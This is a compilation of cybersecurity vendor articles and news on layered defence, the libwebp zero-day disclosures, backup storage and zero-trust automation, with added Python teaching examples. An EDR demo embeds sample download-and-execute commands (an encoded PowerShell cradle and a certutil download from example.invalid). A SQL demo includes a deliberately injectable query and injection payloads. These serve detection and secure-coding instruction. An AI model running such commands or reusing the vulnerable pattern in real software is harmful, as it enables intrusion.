Actiphy

The Anatomy of a Resilient Infrastructure: Mitigating Risks and Ensuring Protection


Introduction

Organisations must take a multifaceted approach to secure their digital assets in an era of rapidly evolving cyber threats. This comprehensive article delves deep into the labyrinth of infrastructure security, examining its various components: the software layer, the hardware layer, and advanced security measures. The endgame here is to arm organisations with the knowledge to construct a resilient infrastructure that is adept at mitigating present-day risks and future-proofed against emerging threats.

The Software Layer: Where Complexity Meets Vulnerability

The Ever-Evolving Landscape of Software Vulnerabilities

Introduction

The software layer is a complex beast, continually evolving and presenting new challenges and vulnerabilities. In the current digital milieu, this layer is the cornerstone of both productivity and vulnerability. Think of it as an advanced game of chess, where strategic manoeuvring isn’t just a matter of choice but an absolute necessity.

The Risks

Navigating this layer goes beyond patching holes and staying compliant with industry standards. We’re looking at an escalating landscape of zero-day exploits, advanced persistent threats (APTs), and increasingly sophisticated malware campaigns. The digital realm is a battlefield where new tactics emerge from the adversary almost daily.

Real-World Case Study

In 2019, a financial services company based in Australia that was compliant with ISO/IEC 27001 successfully thwarted a ransomware attack. How did they do it? Their defence strategy consisted of next-generation antivirus software, further strengthened by an up-to-date intrusion detection system. This incident underlines the value of a proactive stance compared to other organisations that only react post-compromise, often when it’s too late.

The Solutions

While traditional rule-based security mechanisms offer a certain level of protection, they are no longer adequate against sophisticated attacks. Next-gen software solutions are the way forward, with capabilities like real-time threat intelligence, behavioural analytics, and deep integration with globally recognised frameworks like the NIST Cybersecurity Framework.

Old Tech vs. New Tech

It’s essential to understand that traditional antivirus solutions were engineered for a different era. They are generally rule-based and are not designed to tackle modern threats like APTs. Contrast this with state-of-the-art Endpoint Detection and Response (EDR) solutions like CrowdStrike’s Falcon, which utilises behavioural analytics to identify abnormal behaviour, offering more robust security mechanisms.
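What “behavioural analytics” means in practice, as an added example that is not CrowdStrike’s or any vendor’s code: three rules run over constructed, Sysmon-style process-creation records. The ProcessEvent fields, the sample events, the example.invalid URLs and the rule names are all assumptions made for this illustration. Every binary involved is a legitimate, signed Microsoft tool, so a hash or signature check sees nothing; the parent/child chain and the decoded command line are what give the activity away.

```python
"""Behaviour-based detection over process-creation events.

Added example (not CrowdStrike's, nor any vendor's, code): it applies the
kind of parent/child and command-line heuristics that distinguish
behavioural EDR from signature matching. Events are simplified,
constructed Sysmon-style records; the field names are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Strings typical of a download cradle inside a PowerShell script body.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b|invoke-webrequest", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # image name or path of the parent process
    image: str          # image name or path of the created process
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


def _basename(image: str) -> str:
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_powershell(command_line: str) -> Optional[str]:
    """Return the decoded script when the command line carries an encoded command."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events: List[ProcessEvent]) -> List[Finding]:
    """Run three behavioural rules over the event stream."""
    findings: List[Finding] = []
    for i, ev in enumerate(events):
        parent, child = _basename(ev.parent_image), _basename(ev.image)

        # Rule 1: an Office application spawning a shell or script host.
        if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
            findings.append(Finding("office-spawns-script-host", i, f"{parent} -> {child}"))

        # Rule 2: encoded PowerShell whose decoded body contains a download cradle.
        if child in {"powershell.exe", "pwsh.exe"}:
            script = decode_encoded_powershell(ev.command_line)
            if script is not None and CRADLE.search(script):
                findings.append(Finding("encoded-download-cradle", i, script[:80]))

        # Rule 3: certutil used as a downloader (a signed, legitimate binary).
        if child == "certutil.exe" and re.search(r"-urlcache", ev.command_line, re.I):
            findings.append(Finding("certutil-download", i, ev.command_line))
    return findings


# Constructed sample: a benign document open, then a macro-style chain, then a LOLBin download.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
                 "WINWORD.EXE /n invoice.docx"),
    ProcessEvent("C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "C:\\Windows\\System32\\cmd.exe",
                 "cmd.exe /c start powershell"),
    ProcessEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 f"powershell.exe -w hidden -enc {ENCODED}"),
    ProcessEvent("C:\\Windows\\System32\\svchost.exe", "C:\\Windows\\System32\\certutil.exe",
                 "certutil.exe -urlcache -split -f http://example.invalid/x.bin x.bin"),
    ProcessEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Date"),
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f.rule, f.event_index, f.detail)
```

Real telemetry carries far more (user, integrity level, parent command line, network connections), and a production rule set also needs allow-lists for known-good automation that legitimately spawns shells from Office add-ins. The point is that the detection keys on what the process does, not on what its file hashes to.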

Brands and Why Choose Them

For a good reason, cloud-native platforms are gaining significant traction in the security landscape. Solutions like CrowdStrike’s Falcon, built on a cloud-native architecture, enable automated threat hunting and expedited incident response. This dynamism dramatically reduces the time required to identify, mitigate, and recover from security incidents, giving organisations the upper hand in the relentless cyber warfare game.

The Nuanced Challenges

Every organisation’s software stack blends old and new, a mix of legacy systems and modern solutions. These nuances make it critical for security teams to understand their specific environments in-depth. It’s like having a comprehensive map of the landscape you are defending.

A Deeper Dive into Software Update Challenges

Updates to software layers can be a double-edged sword. While they often introduce new features and patches for known vulnerabilities, they can also inadvertently open up new attack vectors, and the update channel itself is a supply-chain target: an attacker who can tamper with a vendor’s update delivers code to every customer at once. Security teams must keep a keen eye on these changes, verifying update signatures, staging releases before broad rollout, and practising a proactive rather than a reactive approach to security.

Concluding Thoughts on the Software Layer

Creating a secure software layer is a continuous process requiring a mix of technological prowess, strategic insight, and real-world practicality. Organisations should aim not only to understand the inherent risks in their software but also to stay updated on emerging threats and security solutions.

The Hardware Layer: The Silent Guardian of Cybersecurity

Introduction

While software takes much of the limelight in cybersecurity discussions, hardware’s role as the first line of defence is often underestimated. Think of hardware as a medieval fortress’s physical walls and fortifications—absolutely crucial but easy to overlook until it’s too late.

The Risks

The hardware layer is prone to a myriad of physical and digital threats. While digital attacks like malware and ransomware often make headlines, physical threats like fire, flooding, and unauthorised access can be equally devastating. Failing to give these risks adequate attention can spell catastrophe for an organisation.

The Solutions

Today’s hardware solutions have come a long way. Multi-tiered physical security features, like biometric authentication and advanced fire-suppression systems, offer added layers of security. These features typically align with international standards like ISO/IEC 27001, providing an added layer of assurance.

Old Tech vs. New Tech

Traditional hardware resilience measures, like RAID configurations, protect against the failure of a single disk but not against site loss, ransomware, or accidental deletion, and with today’s multi-terabyte drives the rebuild window after a failure is long enough that a second failure during it is a realistic risk. Modern software-defined storage (SDS) solutions add features like automated failover and data replication across nodes or sites, providing far more resilience against both physical and digital threats.

Brands and Why Choose Them

Choosing the proper hardware is critical, and there’s no one-size-fits-all solution here. Companies like Dell EMC offer hardware solutions that provide up to military-grade security, while others like Cisco focus more on network-centric hardware security solutions. A blend of these might offer the most comprehensive security infrastructure.

Additional Considerations

The effectiveness of your hardware layer can be severely compromised if it’s not seamlessly integrated with your software and procedural protocols. An excellent firewall can only do so much if your team is unaware of how to manage and maintain it properly.

Concluding Thoughts on the Hardware Layer

Securing your hardware is just as crucial as safeguarding your software. Combining state-of-the-art hardware solutions with best practices like regular firmware and patch management can go a long way in building a resilient cybersecurity posture.

Advanced Security Measures: Going the Extra Mile

The Sophistication of Modern Cyber Threats

Introduction

It’s abundantly clear that in the kaleidoscope of modern cybersecurity, basic measures just won’t cut it anymore. The digital realm is flooded with advanced and sophisticated threats like spear-phishing, SQL injections, and Cross-Site Scripting (XSS) attacks, which can quickly bypass traditional security measures.

The Risks

As cyber threats become more sophisticated, the level of risk escalates correspondingly. It’s no longer about protecting against viruses and malware; the threat landscape now includes highly targeted attacks that can cripple an organisation’s operations and reputation.

Real-World Case Study

Target, Yahoo, Zappos, Equifax, Epic Games, TalkTalk, LinkedIn, and Sony Pictures have all suffered major breaches. Several of these, including Yahoo in 2012, Sony Pictures in 2011 and TalkTalk in 2015, were attributed to SQL injection; others began elsewhere, with Target compromised through a supplier’s stolen credentials and Equifax through an unpatched Apache Struts vulnerability. In every case the financial repercussions were massive, not to mention the erosion of consumer trust and the cost of remediation.

The Solutions

Several measures can effectively counter advanced threats, including adherence to comprehensive guidelines like the OWASP Top Ten. Next-generation firewalls, Data Loss Prevention (DLP) systems, and behavioural analytics tools offer additional security layers.
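The injection named above and its fix, as an added example that is not part of the article: an in-memory SQLite table constructed here, a deliberately vulnerable lookup that splices user input into SQL text, the parameterised version that the OWASP guidance recommends, and HTML output encoding for the XSS case. The table contents, function names and payloads are assumptions made for the illustration.

```python
"""SQL injection: a string-built query beside its parameterised fix.

Added example, not from the article. The table is an in-memory SQLite
database constructed here, so everything runs offline; the lookup
functions are hypothetical, not any product's code. render_greeting
applies the same separation of data from code to HTML output (XSS).
"""
import html
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table with two accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "h1", "admin"), ("bob", "h2", "user")])
    return con


def find_user_vulnerable(con: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # BAD: the input is spliced into the SQL text, so a quote in it rewrites the query.
    query = f"SELECT username, role FROM users WHERE username = '{username}'"
    return con.execute(query).fetchall()


def find_user_safe(con: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    # GOOD: the value is bound as a parameter; the engine never parses it as SQL.
    return con.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def render_greeting(name: str) -> str:
    # Output encoding for HTML: the browser sees text, not markup, whatever the name contains.
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


# Two classic payloads: a tautology, and a comment that truncates the rest of the query.
TAUTOLOGY = "x' OR '1'='1"
COMMENT_TRUNCATION = "alice'--"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", find_user_vulnerable(con, TAUTOLOGY))   # every row comes back
    print("safe:", find_user_safe(con, TAUTOLOGY))               # no row matches that literal name
    print(render_greeting("<script>alert(1)</script>"))
```

The safe version is not “escaping done better”: the value never enters the SQL parser at all, which is why it holds for every quoting trick. The same structural separation is what output encoding gives you on the HTML side.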

Old Tech vs. New Tech

Although effective to an extent, traditional port-and-protocol firewalls lack the sophistication to deal with current threats. Next-gen firewalls with features like Deep Packet Inspection (DPI) and application awareness offer a far more nuanced approach to threat detection and prevention.

Brands and Why Choose Them

Companies like Palo Alto Networks and Fortinet offer cutting-edge, machine learning-powered solutions that proactively adapt to evolving threats. When it comes to advanced security measures, choosing a brand that invests in R&D can make a significant difference.

The Human Factor

The most advanced tech solutions are only effective if the human element is addressed. Human error, negligence, or ignorance can introduce significant vulnerabilities, making ongoing training and awareness initiatives critical.

Advanced Security Considerations

When considering advanced security measures, it’s also crucial to consider additional elements like multi-factor authentication, encryption, and secure code reviews. These are no longer ‘good-to-have’ features but essential layers of a resilient cybersecurity strategy.

Concluding Thoughts on Advanced Security Measures

In today’s cyber environment, where risks are continually evolving, taking your security measures to the next level is not just advisable—it’s imperative. Integrating advanced technologies and adherence to robust security frameworks can significantly boost an organisation’s resilience against modern threats.

Conclusion and Final Thoughts

Building a resilient infrastructure involves far more than installing the latest antivirus or implementing a firewall. It’s a multi-layered challenge that demands a carefully orchestrated blend of state-of-the-art technology, best practices, and human vigilance. Each layer—software, hardware, and advanced security measures—offers challenges and solutions. By developing a nuanced understanding of each, organisations can not only mitigate immediate threats but also prepare for future uncertainties.

In a world where digital transformation is no longer a choice but a necessity, there is no room for complacency. By fortifying every layer of their infrastructure with proactive, robust, and technologically advanced measures, organisations can build a genuinely resilient framework that can withstand the relentless onslaught of modern cyber threats.


Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica


Incomplete information included in recent disclosures by Apple and Google reporting critical zero-day vulnerabilities under active exploitation in their products has created a “huge blindspot” that’s causing a large number of offerings from other developers to go unpatched, researchers said Thursday.

Two weeks ago, Apple reported that threat actors were actively exploiting a critical vulnerability in iOS so they could install espionage spyware known as Pegasus. The attacks used a zero-click method, meaning they required no interaction on the part of targets. Simply receiving a call or text on an iPhone was enough to become infected by Pegasus, which is among the world’s most advanced pieces of known malware.

“Huge blindspot”

Apple said the vulnerability, tracked as CVE-2023-41064, stemmed from a buffer overflow bug in ImageIO, a proprietary framework that allows applications to read and write most image file formats, which include one known as WebP. Apple credited the discovery of the zero-day to Citizen Lab, a research group at the University of Toronto’s Munk School that follows attacks by nation-states targeting dissidents and other at-risk groups.

Four days later, Google reported a critical vulnerability in its Chrome browser. The company said the vulnerability was what’s known as a heap buffer overflow that was present in WebP. Google went on to warn that an exploit for the vulnerability existed in the wild. Google said that the vulnerability, designated as CVE-2023-4863, was reported by the Apple Security Engineering and Architecture team and Citizen Lab.


Rather than Apple, Google, and Citizen Lab coordinating and accurately reporting the common origin of the vulnerability, they chose to use a separate CVE designation, the researchers said. The researchers concluded that “millions of different applications” would remain vulnerable until they, too, incorporated the libwebp fix. That, in turn, they said, was preventing automated systems developers use to track known vulnerabilities in their offerings from detecting a critical vulnerability that’s under active exploitation.

“Since the vulnerability is scoped under the overarching product containing the vulnerable dependency, the vulnerability will only be flagged by vulnerability scanners for these specific products,” Rezilion researchers Ofri Ouzan and Yotam Perkal wrote. “This creates a HUGE blindspot for organizations blindly relying on the output of their vulnerability scanner.”

Google has further come under criticism for limiting the scope of CVE-2023-4863 to Chrome rather than to libwebp. Further, the official description describes the vulnerability as a heap buffer overflow in WebP in Google Chrome.

In an email, a Google representative wrote: “Many platforms implement WebP differently. We do not have any details about how the bug impacts other products. Our focus was getting a fix out to the Chromium community and affected Chromium users as soon as possible. It is best practice for software products to track upstream libraries they depend on in order to pick up security fixes and improvements.”

The representative noted that the WebP image format is mentioned in its disclosure and the official CVE page. The representative didn’t explain why the official CVE and Google’s disclosure did not mention the widely used libwebp library or the likelihood that other software was also likely to be vulnerable.

The Google representative didn’t answer a question asking if CVE-2023-4863 and CVE-2023-41064 stemmed from the same vulnerability. Citizen Lab and Apple didn’t respond to emailed questions before this story went live.
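The blind spot Rezilion describes, made concrete as an added example that is not from the article or from Rezilion’s research: a small CycloneDX-style SBOM (constructed inline, with illustrative component names and versions) is checked two ways. The product-scoped check matches only the product named in the CVE, Google Chrome; the dependency-level check walks the dependency graph and flags every path that ends in a libwebp older than 1.3.2, the upstream release that carries the fix. The Chrome build used as the patched threshold, 116.0.5845.187, is the one Google’s stable channel update for this vulnerability named; the rest is assumption for the illustration.

```python
"""Dependency-level matching for CVE-2023-4863.

Added example, not part of the Ars Technica article or Rezilion's research.
It walks a small CycloneDX-style SBOM (constructed inline) and flags every
path that ends in a libwebp older than 1.3.2, the upstream release carrying
the fix, next to a product-scoped check that only knows about Chrome.
"""
import json
import re
from typing import Dict, List, Set, Tuple

FIXED_LIBWEBP = (1, 3, 2)              # first libwebp release with the fix
FIXED_CHROME = (116, 0, 5845, 187)     # Chrome stable build named in Google's update

# Constructed inventory: a browser plus an internal app that bundles libwebp
# through an imaging library. Versions are illustrative, not a real audit.
SAMPLE_SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "components": [
        {"bom-ref": "chrome", "name": "Google Chrome", "version": "116.0.5845.187"},
        {"bom-ref": "app", "name": "report-generator", "version": "2.4.0"},
        {"bom-ref": "pillow", "name": "Pillow", "version": "10.0.0"},
        {"bom-ref": "libwebp-pillow", "name": "libwebp", "version": "1.3.1"},
        {"bom-ref": "libwebp-sys", "name": "libwebp", "version": "1.3.2"},
    ],
    "dependencies": [
        {"ref": "chrome", "dependsOn": ["libwebp-sys"]},
        {"ref": "app", "dependsOn": ["pillow"]},
        {"ref": "pillow", "dependsOn": ["libwebp-pillow"]},
    ],
})


def parse_version(v: str) -> Tuple[int, ...]:
    """'1.3.2' -> (1, 3, 2); non-numeric parts are ignored so tuples compare cleanly."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def product_scoped_hits(sbom_json: str) -> List[str]:
    """What a scanner keyed on the CVE's listed product sees: Chrome, and only Chrome."""
    sbom = json.loads(sbom_json)
    return [f"{c['name']} {c['version']}" for c in sbom["components"]
            if c["name"] == "Google Chrome" and parse_version(c["version"]) < FIXED_CHROME]


def vulnerable_libwebp_paths(sbom_json: str) -> List[List[str]]:
    """Every dependency path from a top-level component to a libwebp below the fixed version."""
    sbom = json.loads(sbom_json)
    comps: Dict[str, dict] = {c["bom-ref"]: c for c in sbom["components"]}
    deps: Dict[str, List[str]] = {d["ref"]: d.get("dependsOn", []) for d in sbom.get("dependencies", [])}
    depended_on: Set[str] = {child for children in deps.values() for child in children}
    roots = [ref for ref in comps if ref not in depended_on]
    hits: List[List[str]] = []

    def walk(ref: str, path: List[str], seen: frozenset) -> None:
        comp = comps.get(ref)
        if comp is None or ref in seen:      # dangling ref, or a cycle in the graph
            return
        path = path + [f"{comp['name']} {comp['version']}"]
        if comp["name"] == "libwebp" and parse_version(comp["version"]) < FIXED_LIBWEBP:
            hits.append(path)
        for child in deps.get(ref, []):
            walk(child, path, seen | {ref})

    for root in roots:
        walk(root, [], frozenset())
    return hits


if __name__ == "__main__":
    print("product-scoped:", product_scoped_hits(SAMPLE_SBOM))
    print("dependency-level:", vulnerable_libwebp_paths(SAMPLE_SBOM))
```

On this inventory the product-scoped scan reports a clean system, because Chrome is already on the patched build, while the dependency-level walk surfaces the second copy of libwebp that the internal application carries through its imaging library. That second copy is exactly the class of exposure a CVE scoped to “Google Chrome” never names.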



Rethinking Backup Storage: An In-Depth Look at Actiphy StorageServer™


Raising the Bar in Backup Storage: The Actiphy StorageServer™ Advantage

If you’re an IT pro, you already know that protecting your data goes beyond just making backups; it’s also about where and how you’re storing those backups. Let’s introduce you to a next-level game-changer in this realm: Actiphy StorageServer™. Here, we’ll unpack its key features and discuss how it sets a new industry standard, distinguishing itself from competitors like Veeam and ShadowProtect.

Unbreachable Backup Storage: More than Just a Safety Deposit Box

The key to Actiphy StorageServer™’s prowess lies in its seamless integration with ActiveImage Protector™. It offers a secure and unique destination for all your backup needs. What really makes it shine? Its architecturally engineered design that’s highly resilient against ransomware. Instead of relying on a conventional network share, which ransomware running on a backed-up client can reach and encrypt with that client’s own credentials, it creates an isolated “bucket” on the destination server, significantly mitigating the risk of falling victim to ransomware.

Turbocharged Performance: Redefining Backup Speed and Reliability

Gone are the days of settling for sluggish HDD read/write speeds. Actiphy StorageServer™ employs cache devices like USB SSDs to bypass this bottleneck. Our tests have shown that leveraging these cache devices amps up the backup speed six-fold compared to conventional methods.

Next-Gen Data Transmission: QUIC, Unbreakable, and Blazing Fast

Tech enthusiasts, take note: Actiphy StorageServer™ employs the QUIC protocol for data transmission. It’s not just about velocity: QUIC carries TLS 1.3 inside the transport itself, so every connection is encrypted and authenticated by default, and its independent streams avoid the head-of-line blocking that stalls a TCP transfer after a lost packet. When data integrity is your top priority, Actiphy redefines the rules of the game.

One Size Doesn’t Fit All: Multi-Platform Support

Whether you’re rooted in a Windows, Linux, or Docker environment, Actiphy StorageServer™ offers a flexible approach to meet your operating system requirements.

Control Room: The Intuitive Web Console

Though the server demands are minimal, don’t underestimate the power of its web console. Packed with robust features such as real-time monitoring, intuitive bucket management, and cache device configurations, it ensures you always have the upper hand.

Extra Goodies:

  • Event Monitoring: Keep tabs on client connections and task statuses through real-time logs.
  • Alerts: Stay informed with email notifications for specific events, fortified with SSL/TLS support.
  • Symbiotic Relationship: Crafted to operate in unison with ActiveImage Protector™.

Final Takeaway

Actiphy StorageServer™ is the ultimate solution for IT experts who are serious about elevating their backup storage strategy. With its potent combination of speed, security, and adaptability, it’s the smart choice for those looking to step up their data protection game.

Keep pace with breakthroughs like these. Subscribe to our newsletter and follow us on social media for real-time updates and insights.




“Embrace cybersecurity automation and orchestration, but in moderation,” says my puppy | VentureBeat

An automatic dog feeder seemed like a good idea at the time. One of our team members had a COVID puppy, Mango, who ate constantly, and their kids had long abandoned the promises to help. All was good until a malfunction dumped a pound of dog food on Mango mid-feed. The “brave” puppy was too scared to eat from it again.

What does this have to do with cybersecurity? It illustrates the importance of automation and orchestration as they are pillars of proper cybersecurity architecture. But it highlights that there can also be unforeseen risks to consider.

Successful, secure digital transformation requires an automation and orchestration mindset. Humans are not capable of keeping pace with the amount of data, threats and the ever-increasing sophistication of attackers who are leveraging their own automation strategies. As one embarks on zero trust, this becomes even more critical. Automation and orchestration are foundational to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) Zero Trust Maturity Model.

But what does automation and orchestration mean in the context of cybersecurity? We’ll start with some definitions. Automation refers to using technology to automatically perform tasks or actions that humans previously did manually. Orchestration, on the other hand, refers to integrating and coordinating different tools and technologies to create a unified security platform. In the case of the automatic pet feeder, automation would be dispensing food at scheduled times, while orchestration would be aligning feeding times with Mango’s dietary needs and ordering more food when supplies went low.

Automation and orchestration in a zero-trust architecture

How are these practices implemented? As suggested earlier, automation can simplify the enforcement of security policy. Take, for example, the manual process of application segmentation in the context of a zero-trust architecture. Zero trust is a security model that assumes that all users, devices and applications are untrusted and must be verified before granting access to resources and then only grants what is needed by the business — moving away from implicit trust, hence the term “zero trust.” Thus, moving to zero trust allows for granular application segmentation policies that grant access based on business policies.

This is powerful, but creating these rules manually can be difficult and time-consuming. The first step is having the visibility to be able to understand the landscape and what is happening in the environment to set up proper segmentation policies. This was discussed in more depth in this article.

But next comes the processes of creating, maintaining and enforcing the segmentation rules, which will rely heavily on automation techniques coupled with AI/ML insight to create recommendations based on actual usage. It could say, for example, that visibility shows that only the finance department accesses a critical financial software package, even though the entire company has access. It could then automate the creation of a segmentation rule thereby reducing the attack surface by removing unnecessary trust in the environment.

In a zero-trust world, the network stack and the network itself have been removed from the attack surface, leaving effectively the zero-trust platform (like an SSE architecture), the endpoint and identities as the reduced enterprise attack surface. This means that tools like SSE, EDRs and IDPs might each employ automation for efficiency but need orchestration among them.

Take, for example, the previous case where an automatically created segmentation policy only grants access to an application to the finance department. What if the EDR could spot risky behaviour from an employee in the finance department whose device also wasn’t up to security standards? Orchestration between the EDR and SSE would limit access (either a block, limited access or isolated browser access) to the important financial application. In a more radical example, deception could be brought into play with lures that a legitimate employee in finance would never find or use but an attacker might, and automation could immediately send a signal to the security operations team and also create a false application with false data for the attacker to access.

Automation allows for the quick and efficient deployment of security policies, essential for enforcing the zero-trust model. By automating the deployment of security policies, security teams can ensure that access is only granted to authorized users and devices. Orchestration enables security teams to automate workflows and processes across different security tools, allowing them to quickly and efficiently respond to security incidents. In Mango’s case, these techniques did provide her with food on time and reduced the burden on her owners.
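The two steps described above (mining a least-privilege segmentation rule from observed access, then enforcing it together with the EDR’s device posture), as an added example that is not Zscaler’s, CISA’s or any platform’s code. The access log, the current grants, the posture fields (edr_running, patched, risk_score), the min_uses threshold and the allow / isolate / block outcomes are all constructed for the illustration.

```python
"""Least-privilege segmentation rules mined from observed access, then
enforced together with the EDR's device posture.

Added example, not Zscaler's, CISA's or any platform's code. The access
records, current grants and posture signals are constructed inline; the
min_uses threshold and the allow / isolate / block outcomes are assumptions.
"""
from collections import Counter
from typing import Dict, List, Set, Tuple

# Constructed access log over an observation window: (user, group, application)
ACCESS_LOG: List[Tuple[str, str, str]] = [
    ("ana", "finance", "ledger"), ("ben", "finance", "ledger"), ("ana", "finance", "ledger"),
    ("cara", "engineering", "git"), ("dan", "engineering", "git"),
    ("eve", "sales", "crm"), ("eve", "sales", "crm"), ("ana", "finance", "crm"),
]
# Today every group is granted every application: the implicit-trust starting point.
CURRENT_GRANTS: Dict[str, Set[str]] = {
    "ledger": {"finance", "engineering", "sales"},
    "git": {"finance", "engineering", "sales"},
    "crm": {"finance", "engineering", "sales"},
}


def recommend_rules(log, current_grants, min_uses: int = 2) -> Dict[str, Dict[str, Set[str]]]:
    """Per application, split the granted groups into keep / review / remove.

    A group is kept only when it used the application at least min_uses
    times. A single stray access goes to review rather than silently
    confirming a grant, which is also what stops an attacker from
    'teaching' the miner a new entitlement with one request.
    """
    uses = Counter((app, group) for _user, group, app in log)
    rules: Dict[str, Dict[str, Set[str]]] = {}
    for app, granted in current_grants.items():
        keep = {g for g in granted if uses[(app, g)] >= min_uses}
        review = {g for g in granted if 0 < uses[(app, g)] < min_uses}
        rules[app] = {"keep": keep, "review": review, "remove": granted - keep - review}
    return rules


def access_decision(group: str, app: str, rules, posture: Dict[str, object]) -> str:
    """Orchestration step: the segmentation rule combined with the EDR's device signal.

    Groups under review keep their access until a human decides, so the
    automation narrows trust without locking anyone out on one observation.
    """
    entitled = rules[app]["keep"] | rules[app]["review"]
    if group not in entitled:
        return "block"          # outside the least-privilege rule altogether
    if not posture.get("edr_running", False) or int(posture.get("risk_score", 0)) >= 80:
        return "block"          # unmonitored or high-risk device: deny even an entitled user
    if not posture.get("patched", False):
        return "isolate"        # entitled but non-compliant: isolated browser / read-only path
    return "allow"


if __name__ == "__main__":
    mined = recommend_rules(ACCESS_LOG, CURRENT_GRANTS)
    for app, buckets in mined.items():
        print(app, {k: sorted(v) for k, v in buckets.items()})
    print(access_decision("finance", "ledger", mined,
                          {"edr_running": True, "patched": False, "risk_score": 12}))
```

The review bucket is the “moderation” the title asks for: a group seen once is neither kept nor cut automatically, which also blunts an adversary who tries to earn an entitlement with a single observed access, or to get a legitimate group removed by suppressing its traffic during the observation window.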

Where things get complicated

So what are the challenges? Automation and orchestration are fine when they are done incrementally and strategically, but they can potentially be turned against the defender by an attacker, even one who doesn’t know the specific pages of the playbook or the code of the automated scripts. With an intelligent opponent and given multiple opportunities to attack and learn from one another, automation that can be seen and triggered intentionally can be exploited. This is seen in the fraud world, where large volumes of fraudulent transactions give real-time feedback to cyber criminals: when something is effective, it is noted and used again immediately with swarm-like intensity.

There are three general principles to employ when using automation and orchestration to minimize these risks and maximize the gains in efficiency, cost reduction, and security effectiveness:

Overall, automation and orchestration are critical components of a strong cybersecurity strategy. Arguably, they may be necessary to grow in maturity and handle advanced threats at scale. But the real goal is business transformation: network, application, and security. This mentality will enable us to focus on that and get on with that transformation. Automation and orchestration are vital qualities of a large-scale zero-trust platform, and as we’ve seen, they have to be done in a way that minimizes the ability of adversaries to abuse and turn them on the defenders.

After all, accidentally dropping a pound of dog food on my puppy is one thing, but hacking the dispenser and shooting dog food at Mango is completely unacceptable! Used correctly, these methods will serve us, enable secure digital transformation and maybe help ease the burden on puppies and their owners.

To see how Zscaler is helping its customers reduce business risk, improve user productivity and reduce cost and complexity, visit https://www.zscaler.com/platform/zero-trust-exchange

Sanjit Ganguli is VP Transformation Strategy & Field CTO at Zscaler. Sam Curry is VP, CISO at Zscaler. Nathan Howe is VP Emerging Technology at Zscaler.


About Actiphy and Cybersecurity: As the digital landscape continually evolves, the importance of robust cybersecurity measures cannot be overstated. Actiphy provides a comprehensive suite of solutions designed to address the multifaceted challenges of today’s cybersecurity environment. From data backup to rapid system recovery, our tools are designed with a proactive approach to safeguarding your digital assets. In the context of automation and orchestration, Actiphy’s solutions can seamlessly integrate with your existing systems, enhancing their efficiency and reducing vulnerabilities. Learn more about how Actiphy is championing secure digital transformations by visiting our solutions page.


Navigating the Future of Data Protection with Richard Giddey, VP APAC at Actiphy


Navigating the Future of Data Protection

Introduction

Welcome back to our ongoing series on the evolving landscape of data protection. I'm Richard Giddey, your navigator through this complex but critical domain. Today, we will dissect the vital relationship between cybersecurity and data protection and why you can't effectively have one without the other.


The Inseparable Duo: Cybersecurity and Data Protection

Understanding The Bond

In an era of cyber threats like ransomware and data breaches, cybersecurity is not a standalone concept but is deeply interwoven with data protection. Both play essential roles in safeguarding an organisation’s most valuable asset—data.


The Anatomy of a Resilient Infrastructure

Hardware and Software Synergy
The bedrock of a resilient infrastructure lies in the symbiotic relationship between hardware and software. While robust servers and data storage solutions are key, they must be complemented by agile software solutions capable of mitigating real-time security risks. For instance, next-gen antivirus software can detect anomalies that traditional firewalls may overlook.

Layered Security: The Pillars of Defence
Effective security is like a well-designed fortress comprising multiple layers, each serving a specific function. Firewalls may serve as the moat, but intrusion detection systems act as the watchtowers, ever vigilant against new cyber threats. Regular security audits and updates keep the fortress standing tall.

Employee Training: The First Line of Defence
The human element is one of the most overlooked aspects of a resilient infrastructure. No amount of sophisticated hardware or software can compensate for a poorly trained staff susceptible to social engineering attacks.


Bridging the Protection Gap: Backup Strategies

Beyond Traditional Backup
Gone are the days when backup strategies were solely meant for accidental deletions or hardware failures. With the rise of ransomware attacks, a backup is often the last line of defence. Modern backup solutions offer features like real-time monitoring and encryption to ensure your data is retrievable and secure even in a cyberattack.


Keeping an Eye on Regulatory Requirements

In a world where data sovereignty and privacy issues are under intense scrutiny, being aware of and compliant with the current legislation is not optional but mandatory.


